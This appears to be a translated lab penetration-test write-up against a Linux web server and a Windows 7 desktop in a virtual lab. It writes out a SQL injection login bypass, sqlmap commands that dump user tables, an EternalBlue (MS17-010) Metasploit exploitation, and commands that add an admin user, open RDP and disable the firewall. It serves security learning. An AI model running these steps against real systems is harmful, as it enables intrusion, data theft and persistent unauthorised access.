20201216 penetration test report

------------Restore content start------------

0x00 environment

Two target aircrafts: from the host of a small enterprise

  1. Server : Linux

  2. Desktop : win

As shown in the figure:




One attacker: Kali Linux (self installed)

README attachment:




Environment configuration:

According to the README document, first put two target aircraft and one attacker on, and the network connection mode adopts NAT mode.

0x01 penetration process - Server

At this time, my virtual machine only has one kali and one server target. The following operations are performed in kali.

First, use nmap to scan and identify the host operating system.

Execute command:

nmap -O



Result analysis: This is a Linux system. It can be preliminarily determined that this is a server server. Therefore, the server ip:


nmap -sV



Scan the port service and its version of the host, and the above results are obtained.


Since I am a chicken player who mainly focuses on the web, I first infiltrate port 80.

1, 80 port:

First, use the browser to browse



Use passive scanning to open zap or burp, and manually browse all browsable pages.

Found in Under, there are suspicious sql injection points.



Enter in the password form: 'or 1=1#

Successfully logged in. Successfully verified the existence of sql injection vulnerability. In consideration of efficiency, sqlmap is used for vulnerability exploitation.

sqlmap -u  --forms



It is found that there are two injection points (manual mining is supplemented. Not only the password parameter has injection points, but also the login parameter has injection points):




Find the current database and current user:

sqlmap -u  --forms --current-db --current-user



Result: current user: company@localhost

Current database: company


Find all tables:

sqlmap -u  --forms --tables

company database:




information_schema database:






One step direct dump

sqlmap -u  --forms -D company -T users --columns --dump

Directly query all the columns under the users table in the company database:



And the values in the table:



Results obtained:



Enter the following command:


sqlmap -u  --forms --os-shell




It is found that sql injection is not allowed to take shell.

Next, zap was used for active scanning, and an additional reflective xss vulnerability was found.

Similarly, xss vulnerability also exists at the sql injection point. As shown in the following figure, submit post parameters:






No, I can't find it. Port 80 is over.


2, 139, 445 ports:

I have checked all the loopholes that can be checked and tried everything that can be tried. My neck is sore. No progress, go to the Desktop.


0x02 penetration process - Desktop

First, use nmap to check the ip address of the desktop host, and use the following command:


nmap -O




You can confirm that the ip address of the desktop host is

Use the following command to view more detailed information:

nmap -A -oN Desk_nmap_A.txt

Exported Desk_nmap_A.txt as follows:

# Nmap 7.80 scan initiated Thu Dec 17 00:46:37 2020 as: nmap -A -oN Desk_nmap_A.txt
Nmap scan report for
Host is up (0.00043s latency).
Not shown: 997 filtered ports
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:10:02:00 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Service Info: Host: WIN-USPQ65TE72P; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-USPQ65TE72P, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:10:02:00 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: WIN-USPQ65TE72P
|   NetBIOS computer name: WIN-USPQ65TE72P\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-16T16:46:51+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-16T16:46:51
|_  start_date: 2020-12-16T16:35:05

1   0.43 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 17 00:47:30 2020 -- 1 IP address (1 host up) scanned in 53.10 seconds

It is found that port 445 is running Microsoft DS, execute the following command:

nmap --script=smb-vuln-*.nse --script-args=unsafe=1



CVE-2017-0143 vulnerability is most likely to exist.

Open msfconsole and use exploit/windows/smb/ms17_010_eternalblue vulnerability module, after set RHOST, exploit.

You can get the shell. As shown in the figure:








The next step is to find a way to raise power

1. add a new user:


net user kangel 2314838574 /add


2. add a new user to the administrator group

net localgroup administrators kangel /add

3. open 3389 port for remote connection

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4. turn off the firewall (if it is not turned off, the next remote connection cannot be made)

NetSh Advfirewall set allprofiles state off 


 5. Open a new win7 virtual machine for remote connection.




------------End of recovery------------

Posted by Leppy on Fri, 03 Jun 2022 16:20:53 +0530